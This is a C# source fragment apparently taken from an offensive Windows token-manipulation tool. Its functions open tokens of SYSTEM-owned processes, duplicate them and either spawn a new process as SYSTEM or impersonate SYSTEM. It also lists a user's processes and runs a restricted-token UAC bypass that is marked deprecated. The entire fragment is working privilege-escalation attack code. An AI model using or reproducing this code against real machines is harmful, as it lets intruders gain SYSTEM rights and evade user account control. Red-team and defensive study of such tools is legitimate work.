////////////////////////////////////////////////////////////////////////////////
// Creates a new process as SYSTEM
////////////////////////////////////////////////////////////////////////////////
public bool GetSystem(string newProcess)
{
SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
foreach (uint process in processes.Keys)
{
if (OpenProcessToken((int)process))
{
Console.WriteLine(" [+] Opened {0}", process);
SetWorkingTokenToRemote();
if (DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
{
SetWorkingTokenToNewToken();
if (StartProcessAsUser(newProcess))
{
return(true);
}
}
}
}
Misc.GetWin32Error("GetSystem");
return(false);
}
////////////////////////////////////////////////////////////////////////////////
// Use Native APIs to find processes that a user is running
////////////////////////////////////////////////////////////////////////////////
private static void _FindUserProcesses(CommandLineParsing cLP)
{
string user;
if (!cLP.GetData("username", out user))
{
Console.WriteLine("[-] Username not specified");
return;
}
Dictionary <uint, string> processes = UserSessions.EnumerateUserProcesses(false, user);
Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
foreach (uint pid in processes.Keys)
{
Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
}
}
////////////////////////////////////////////////////////////////////////////////
// Elevates current process to SYSTEM
////////////////////////////////////////////////////////////////////////////////
public bool GetSystem()
{
SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));
Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());
foreach (uint process in processes.Keys)
{
if (OpenProcessToken((int)process))
{
Console.WriteLine(" [+] Opened {0}", process);
SetWorkingTokenToRemote();
if (ImpersonateUser())
{
return(true);
}
}
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
// UAC Token Magic - Deprecated
////////////////////////////////////////////////////////////////////////////////
private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
{
Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
if (cLP.Remote)
{
using (RestrictedToken rt = new RestrictedToken(hToken))
{
rt.BypassUAC(cLP.ProcessID, cLP.Command);
}
}
else
{
string name = WindowsIdentity.GetCurrent().Name;
Dictionary <uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name);
foreach (uint pid in uacUsers.Keys)
{
Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
using (RestrictedToken rt = new RestrictedToken(hToken))
{
rt.BypassUAC((int)pid, cLP.Command);
}
}
}
}
